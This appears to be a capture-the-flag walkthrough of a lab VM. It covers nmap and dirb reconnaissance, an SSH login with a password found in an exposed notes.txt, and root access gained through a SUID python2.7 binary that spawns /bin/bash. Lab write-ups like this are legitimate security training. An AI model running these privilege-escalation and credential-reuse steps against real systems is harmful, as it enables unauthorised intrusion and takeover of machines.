$ sudo netdiscover -i wlp2s0
 192.168.1.8
 
$ nmap -sV 192.168.1.8 -Pn -T5 -p-

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
51588/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ nmap -A 192.168.1.8 -Pn -T5 -p-

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39234/tcp6  status
|   100024  1          51588/tcp   status
|   100024  1          54432/udp   status
|_  100024  1          55464/udp6  status
51588/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


$ dirb http://192.168.1.8

---- Scanning URL: http://192.168.1.8/ ----
==> DIRECTORY: http://192.168.1.8/admin/                                       
==> DIRECTORY: http://192.168.1.8/css/                                         
==> DIRECTORY: http://192.168.1.8/img/                                         
+ http://192.168.1.8/index.html (CODE:200|SIZE:6437)                           
==> DIRECTORY: http://192.168.1.8/js/                                          
+ http://192.168.1.8/LICENSE (CODE:200|SIZE:1093)                              
==> DIRECTORY: http://192.168.1.8/mail/                                        
==> DIRECTORY: http://192.168.1.8/manual/                                      
+ http://192.168.1.8/server-status (CODE:403|SIZE:299)                         
==> DIRECTORY: http://192.168.1.8/vendor/     


I ran a nikto scan ,too but it did not gave too much valuable information.


lets check admin directory

http://192.168.1.8/admin

there is a notes.txt file in here lets see it
Note to myself :

I need to change my password :/ 12345ted123 is too outdated but 
the technology isn't my thing i prefer go fishing or watching soccer .

Lets ssh with name ted and this password

$ ssh -l ted 192.168.1.8 

yes we are in


when I was triyng to find suid bits

$ find / -type f -perm /4000 2>/dev/null

/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount


I tried to exploti exim4 but perl_startup option was not set
so I tried another thing which is python2.7

lets get a shell via python

$ /usr/bin/python2.7
>>>import os
>>>os.system("/bin/bash")

#whoami
root

#cat /root/flag.txt

_________                                  
|  _   _  |                                 
|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   _| |_ | \__. | | \__/ | | \__/ || \__. | 
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                 [__|     [__|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

